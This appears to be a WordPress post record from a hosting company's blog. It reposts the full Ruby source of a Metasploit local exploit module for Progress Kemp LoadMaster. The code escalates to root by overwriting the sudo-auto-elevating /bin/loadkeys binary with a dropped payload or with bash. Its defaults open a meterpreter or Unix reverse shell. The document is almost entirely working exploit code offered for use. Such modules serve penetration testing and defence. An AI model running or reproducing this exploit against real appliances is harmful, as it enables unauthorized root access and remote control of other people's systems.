{"id":56778,"date":"2024-05-13T21:39:55","date_gmt":"2024-05-13T17:39:55","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/178554\/progress_kemp_loadmaster_sudo_privesc_2024.rb.txt"},"modified":"2024-05-13T21:39:55","modified_gmt":"2024-05-13T17:39:55","slug":"kemp-loadmaster-local-sudo-privilege-escalation","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/kemp-loadmaster-local-sudo-privilege-escalation\/","title":{"rendered":"Kemp LoadMaster Local sudo Privilege Escalation"},"content":{"rendered":"

# This module requires Metasploit: https:\/\/metasploit.com\/download
# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
##<\/p>\n

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking<\/p>\n

include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
include Msf::Post::File<\/p>\n

prepend Msf::Exploit::Remote::AutoCheck<\/p>\n

def initialize(info = {})
super(
update_info(
info,
‘Name’ => ‘Kemp LoadMaster Local sudo privilege escalation’,
‘Description’ => %q{
This module abuses a feature of the sudo command on Progress Kemp
LoadMaster. Certain binary files are allowed to automatically elevate
with the sudo command. This is based off of the file name. Some files
have this permission are not write-protected from the default ‘bal’ user.
As such, if the file is overwritten with an arbitrary file, it will still
auto-elevate. This module overwrites the \/bin\/loadkeys file with another
executable.
},
‘Author’ => [
‘Dave Yesland with Rhino Security Labs’,
‘bwatters-r7’ # module,
],
‘License’ => MSF_LICENSE,
‘References’ => [
[‘URL’, ‘https:\/\/rhinosecuritylabs.com\/research\/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster\/’],
[‘URL’, ‘https:\/\/kemptechnologies.com\/kemp-load-balancers’]],
‘DisclosureDate’ => ‘2024-03-19’,
‘Notes’ => {
‘Stability’ => [ CRASH_SAFE ],
‘SideEffects’ => [ IOC_IN_LOGS, ARTIFACTS_ON_DISK],
‘Reliability’ => [ REPEATABLE_SESSION ]},
‘SessionTypes’ => [‘shell’, ‘meterpreter’],
‘Platform’ => [‘unix’, ‘linux’],
‘Targets’ => [
[
‘Dropper’,
{
‘Arch’ => [ARCH_X86, ARCH_X64],
‘Type’ => :dropper,
‘DefaultOptions’ => {
‘PAYLOAD’ => ‘linux\/x64\/meterpreter_reverse_tcp’
}
}
],
[
‘Command’,
{
‘Arch’ => [ARCH_CMD],
‘Type’ => :command,
‘Payload’ =>
{
‘BadChars’ => “\\x27”,
‘Compat’ =>
{
‘PayloadType’ => ‘cmd’,
‘RequiredCmd’ => ‘generic gawk telnet ssh echo’
}
},
‘DefaultOptions’ => {
‘PAYLOAD’ => ‘cmd\/unix\/reverse’
}
}
]],
‘Privileged’ => true
)
)
register_options([
OptString.new(‘TARGET_BINARY’, [true, ‘The path for a binary file that has permission to auto-elevate.’, ‘\/bin\/loadkeys’]),
OptString.new(‘WRITABLE_DIR’, [ true, ‘A directory where we can write files’, ‘\/tmp’ ])
])
end<\/p>\n

def check
score = 0
score += 1 if read_file(‘\/usr\/wui\/index.js’).include?(‘KEMP’)
score += 1 if read_file(‘\/etc\/motd’).include?(‘Kemp LoadMaster’)
score += 1 if exists?(‘\/usr\/wui\/eula.kemp.html’)
vprint_status(“Found #{score} indicators this is a KEMP product”)
return CheckCode::Detected if score > 0<\/p>\n

return CheckCode::Safe
end<\/p>\n

def verify_copy(src, dest, elevate)
orig_file_hash = file_remote_digestmd5(src)
vprint_status(“Moving #{src} to #{dest}”)
if elevate
output = cmd_exec(“sudo \/bin\/cp ‘#{src}’ ‘#{dest}'”)
else
output = cmd_exec(“\/bin\/cp ‘#{src}’ ‘#{dest}'”)
end
return true if file_remote_digestmd5(dest) == orig_file_hash<\/p>\n

print_bad(“Copy failed – #{output}”)
false
end<\/p>\n

def execute_dropper(target_binary, binary_rename, temp_payload_path)
vprint_status(“Writing payload to #{temp_payload_path}”)
write_file(temp_payload_path, generate_payload_exe)
chmod(temp_payload_path)
register_file_for_cleanup(temp_payload_path)
return unless verify_copy(target_binary, binary_rename, false)
return unless verify_copy(temp_payload_path, target_binary, true)<\/p>\n

vprint_status(“Running #{target_binary}”)
cmd_exec(“sudo ‘#{target_binary}'”)
end<\/p>\n

def execute_command(target_binary, binary_rename, cmd)
vprint_status(‘Preparing payload command’)
# save copy of target_binary
return unless verify_copy(target_binary, binary_rename, false)
return unless verify_copy(‘\/bin\/bash’, target_binary, true)<\/p>\n

vprint_status(‘Running payload command’)
vprint_status(cmd_exec(“sudo #{target_binary} -c ‘#{cmd}'”))
end<\/p>\n

def exploit
writable_dir = datastore[‘WRITABLE_DIR’]if writable_dir.blank? || (writable_dir[-1] != ‘\/’)
writable_dir += ‘\/’
end
fail_with(Failure::BadConfig, “Invalid WRITABLE_DIR: #{writable_dir}”) unless directory?(writable_dir)
target_binary = datastore[‘TARGET_BINARY’]binary_rename = writable_dir + “.#{Rex::Text.rand_text_alpha_lower(6..12)}”
target_binary_hash = file_remote_digestmd5(target_binary)
begin
case target[‘Type’]when :dropper
temp_payload = writable_dir + “.#{Rex::Text.rand_text_alpha_lower(6..12)}”
execute_dropper(target_binary, binary_rename, temp_payload)
when :command
execute_command(target_binary, binary_rename, payload.encoded)
end
ensure
unless target_binary_hash == file_remote_digestmd5(target_binary)
cmd_exec(“sudo rm ‘#{target_binary}'”)
verify_copy(binary_rename, target_binary, true)
cmd_exec(“sudo rm ‘#{binary_rename}'”)
end
end
if target_binary_hash == file_remote_digestmd5(target_binary)
print_good(“#{target_binary} returned to original contents”)
else
print_bad(“#{target_binary} was not returned to original contents”)
end
end
end<\/p>\n","protected":false},"excerpt":{"rendered":"

# This module requires Metasploit: https:\/\/metasploit.com\/download# Current source: https:\/\/github.com\/rapid7\/metasploit-framework## class MetasploitModule < Msf::Exploit::LocalRank = ExcellentRanking include Msf::Exploit::EXEinclude Msf::Exploit::FileDropperinclude Msf::Post::File prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {})super(update_info(info,‘Name’ => ‘Kemp LoadMaster Local sudo privilege escalation’,‘Description’ => %q{This module abuses a feature of the sudo command on Progress KempLoadMaster. Certain binary files are allowed to automatically elevatewith the sudo …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-56778","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56778","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=56778"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/56778\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=56778"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=56778"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=56778"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}